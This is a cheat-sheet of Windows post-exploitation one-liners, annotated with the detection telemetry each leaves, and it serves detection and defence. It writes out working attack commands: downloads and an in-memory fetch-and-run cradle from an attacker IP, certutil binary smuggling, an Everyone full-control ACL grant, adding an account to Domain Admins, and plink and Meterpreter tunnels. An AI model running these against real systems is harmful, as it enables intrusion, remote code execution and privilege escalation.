99 Basic Commands
# Cheat-sheet of Windows post-exploitation one-liners. The lines mix cmd.exe,
# PowerShell and Meterpreter-console syntax and are not a runnable script;
# the IPs, ports, account names and file names are the values from the
# original listing. The notes below describe the telemetry each technique
# leaves behind so a defender can detect or block it.
// File Download
# certutil with -urlcache/-split/-f is a well-known living-off-the-land
# downloader: certutil.exe making an outbound HTTP request is a high-signal
# event in command-line and network logs.
certutil.exe -urlcache -split -f http://ip/file file
# Same download via the PowerShell cmdlet; PowerShell module/script-block
# logging and file-creation events under C:\Windows\Temp cover this.
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
// Powershell download
# "-exec bypass" only sets the execution policy for this process; it is not a
# security boundary, but the string itself is worth alerting on in process
# command-line logs. The file lands under system32 — an executable created
# there by powershell.exe is a strong indicator on its own.
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
// Powershell remote execution
# Download cradle: DownloadString + IEX runs the fetched script (Sherlock's
# Find-AllVulns, with a follow-up command) in memory without writing to disk,
# so script-block logging (Event 4104) and AMSI, not file-based AV, are the
# relevant controls.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
# Grants Everyone full control of text.txt — an over-permissive ACL. Permission
# changes on audited objects surface as Event 4670.
icacls text.txt /grant Everyone:F
# PowerView cmdlet adding an account to Domain Admins. This is a directory
# write and is logged on the domain controller as Event 4728 (member added to
# a security-enabled global group); treat it as a high-severity alert.
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
# certutil used as a base64 codec to move a binary through a text-only
# channel; certutil -decode producing an .exe is a useful detection.
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
# Port forward using plink
# Reverse tunnel over SSH. -pw places the password on the command line, where
# any local user can read it from the process list; the -R forward exposes a
# service on 127.0.0.1 to the SSH server. Outbound SSH from plink.exe on a
# workstation is itself a good detection.
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
# Port forward using meterpreter
# Generic form, then a concrete example forwarding 3306 (MySQL). The listener
# is on the attacker side; on the victim this presumably shows as the implant
# process connecting to victim-ip:port, so monitor the C2 channel rather than
# local listening sockets.
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56